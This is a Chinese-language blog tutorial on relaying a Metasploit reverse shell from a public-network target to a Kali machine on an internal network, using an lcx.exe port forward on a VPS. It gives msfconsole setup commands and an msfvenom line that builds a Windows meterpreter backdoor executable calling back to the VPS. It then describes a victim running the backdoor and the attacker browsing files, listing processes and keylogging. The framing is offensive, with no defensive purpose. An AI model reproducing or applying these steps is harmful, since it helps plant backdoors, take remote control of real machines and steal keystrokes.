蜗蜗侠's Blog-关注网络安全移动版

主页 > 黑客/白帽 > Linux_Kali >

公网的Shell如何返回到内网的Kali

Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞 的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具 来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种 攻击工具,并将它们贡献给所有Metasploit用户。

Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。(摘自百度百科)

今 天我们主要解决的是现在的主机商提供的系统主要分为Linux与Windows两个大的平台,kali虽然是Linux但是基本没有主机商会提供它的镜像 安装,但是如果我们的目标在公网,但是我们攻击机Kali在内网,那么我们的kali就基本发挥不出它强大的实力了,因为公网返回的Shell根本就返回 不到Kali中,今天我们解决的就是这个问题。

测试工具:
        Lcx.exe    端口转发
        Kali 内网环境下的攻击主机
        VPS 公网环境下的用于lcx端口转发
        目标主机  可以是公网/内网下的主机


1.service postgresql start   启动数据库服务器
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 2.msfdb init                    初始化数据库
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 3.cat /usr/share/metasploit-framework/config/database.yml  查看数据库链接信息(一会链接会用到)
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 4.msfconsole 启动msf控制台
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 5.db_status  查看数据库连接 
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
6.db_connect user:pass@host:port/dbname 链接数据库
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
  以上我们的前期准备工作就完成了,下面我们需要用公网的VPS,进行转发。
-listen 6666 8888 监听8888的数据转发到6666端口
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 7.msfVENOM -p windows/metre.....  LHOST=host LPORT=prot -f exe >/root/Desktop/test.exe  生成payload
LHOST为VPS的地址,LPORT为lcx.exe的连接端口(这里我们是8888端口)
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 8.armitage 图形化页面的metasploit
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 (启动页面)默认配置 直接连接就可以
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 (软件界面)
我们依次选择 Armitage->listeners->bind 新建一个绑定型的shell 配置如下host为VPS地址,port为lcx的传输端口(这里我们是6666端口)
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 下面我们模拟用户打开我们的后门程序
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 后门启动后会连接我们VPS的8888端口,监听程序会显示流量,同时他会将流量转发到6666端口
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 由于Metasploit已经连接到VPS的6666端口,所以接收到VPS转发来的数据,成功返回一台主机shell
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 对主机一些简单的操作(我做测试的主机在内网,所以通过VPS返回了一个内网的主机)
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 (浏览文件)
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 (显示进程)
公网的Shell如何返回到内网的Kali - sn0w - 雪花 -  root@sn0w.top
 (键盘记录及其他)


具体怎么发挥就看自己了
msfvenom还可以生成php、asp等多种形式的payload,关于他的一些其他用法可以参考:Metasploit msfvenom 使用说明


(责任编辑:蜗蜗侠)